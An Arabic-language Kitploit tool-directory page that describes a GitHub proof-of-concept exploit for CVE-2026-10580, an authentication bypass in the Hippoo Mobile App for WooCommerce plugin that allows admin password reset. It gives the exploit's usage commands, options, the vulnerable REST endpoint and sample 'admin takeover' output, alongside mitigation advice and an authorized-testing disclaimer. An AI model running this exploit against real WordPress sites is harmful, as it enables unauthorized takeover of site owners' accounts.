Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10580 — استغلال PoC لـ CVE-2026-10580 - تجاوز المصادقة في تطبيق Hippoo المحمول لـ WooCommerce <= 1.9.4 يؤدي إلى الاستيلاء على حساب المسؤول | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
المصادقة والترخيصهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

استغلال PoC لـ CVE-2026-10580 - تجاوز المصادقة في تطبيق Hippoo المحمول لـ WooCommerce <= 1.9.4 يؤدي إلى الاستيلاء على حساب المسؤول

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WordPress

WordPress - إضافة Hippoo Mobile App for WooCommerce <= 1.9.4 - تجاوز المصادقة إلى الاستيلاء على حساب المسؤول

License: MIT

نظرة عامة

هذه الأداة هي إثبات مفهوم لاستغلال الثغرة CVE-2026-10580، وهي ثغرة تجاوز المصادقة تؤثر على إضافة Hippoo Mobile App for WooCommerce لووردبريس (الإصدارات <= 1.9.4). تسمح الثغرة للمهاجمين غير الموثوقين بإعادة تعيين كلمة مرور أي مستخدم، بما في ذلك المسؤولين، مما يؤدي إلى الاستيلاء الكامل على الموقع.

⚠️ هام: هذه الأداة مخصصة لأغراض اختبار الأمان المصرح به والتعليم فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.

الميزات

  • يسرد جميع مستخدمي ووردبريس عبر نقطة نهاية REST API الضعيفة
  • يعيد تعيين كلمة المرور لمعرف مستخدم محدد (الافتراضي: معرف المسؤول 1)
  • واجهة سطر أوامر بسيطة مع مخرجات ملونة
  • خيار تعطيل التحقق من SSL لبيئات الاختبار

الاستخدام

المتطلبات الأساسية

  • Python 3.6+
  • مكتبة requests

تثبيت التبعيات:

root@kitploit:~
pip install requests

الأمر الأساسي

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

الخيارات

أمثلة

الاستغلال باستخدام معرف المسؤول الافتراضي (1) والتحقق من SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

استهداف معرف مستخدم معين وتعطيل التحقق من SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

التشغيل بدون الشعار:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

مثال على المخرجات

root@kitploit:~
[+] Found 3 user(s)
    - User ID: 1 | Username: admin | Role: administrator
    - User ID: 2 | Username: editor_user | Role: editor
    - User ID: 3 | Username: subscriber1 | Role: subscriber

╔══════════════════════════════════════════════════════════════╗
║             ADMIN TAKEOVER SUCCESSFUL                        ║
╚══════════════════════════════════════════════════════════════╝
    Target: https://example.com
    Login: https://example.com/wp-admin
    Username: admin
    Password: PwnedCVE2026!!

التخفيف

إذا كنت تستخدم إضافة Hippoo، قم بتحديثها فوراً إلى إصدار مصحح (>1.9.4). بالإضافة إلى ذلك:

  • قم بمراجعة حسابات المستخدمين بانتظام بحثاً عن أي تغييرات غير مصرح بها
  • راقب السجلات بحثاً عن طلبات API غير متوقعة إلى /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • فكر في تقييد الوصول إلى REST API الخاصة بووردبريس إذا لم تكن ضرورية

الترخيص

هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للتفاصيل.

المؤلف

0xgh057r3c0n

إخلاء المسؤولية

المؤلف غير مسؤول عن أي استخدام خاطئ لهذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

تنزيل الأداة
الوسيطالوصف
-t, --targetعنوان URL لموقع ووردبريس الهدف (مثال: https://example.com)
-p, --passwordكلمة المرور الجديدة لتعيينها لحساب المسؤول
-i, --idمعرف المستخدم للاستيلاء عليه (الافتراضي: 1)
-k, --insecureتخطي التحقق من شهادة SSL
--no-bannerإخفاء شعار ASCII